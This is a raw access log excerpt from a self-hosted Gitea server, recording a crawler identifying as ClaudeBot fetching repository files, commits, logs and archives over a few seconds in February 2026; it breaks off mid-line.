"/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10077] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/tsconfig.json" [Client 216.73.216.188] [Length 9766] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 20272] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html?display=source" [Client 216.73.216.188] [Length 32604] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj?display=rendered" [Client 216.73.216.188] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs?display=source" [Client 216.73.216.188] [Length 11932] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf?display=rendered" [Client 216.73.216.188] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11055] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 216.73.216.188] [Length 11455] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?files=.TemporaryDocument" [Client 216.73.216.188] [Length 17019] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 38249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 216.73.216.188] [Length 13000] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf?display=source" [Client 216.73.216.188] [Length 11945] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html" [Client 216.73.216.188] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11650] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10922] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker" [Client 216.73.216.188] [Length 190754] [Gzip 12.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 11981] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 216.73.216.188] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/App.tsx" [Client 216.73.216.188] [Length 9765] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14637] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/App.tsx" [Client 216.73.216.188] [Length 800] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 216.73.216.188] [Length 16192] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 216.73.216.188] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=source" [Client 216.73.216.188] [Length 11683] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 10938] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json?display=rendered" [Client 216.73.216.188] [Length 11092] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11522] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 22014] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 216.73.216.188] [Length 9842] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2?display=source" [Client 216.73.216.188] [Length 31272] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15562] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 7498] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 216.73.216.188] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13183] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 15591] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 216.73.216.188] [Length 16071] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12170] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11685] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10840] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log?display=source" [Client 216.73.216.188] [Length 27627] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" [Client 216.73.216.188] [Length 11278] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 26614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" [Client 216.73.216.188] [Length 10869] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 7414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj?display=source" [Client 216.73.216.188] [Length 11731] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.tar.gz" [Client 216.73.216.188] [Length 314442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 10926] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 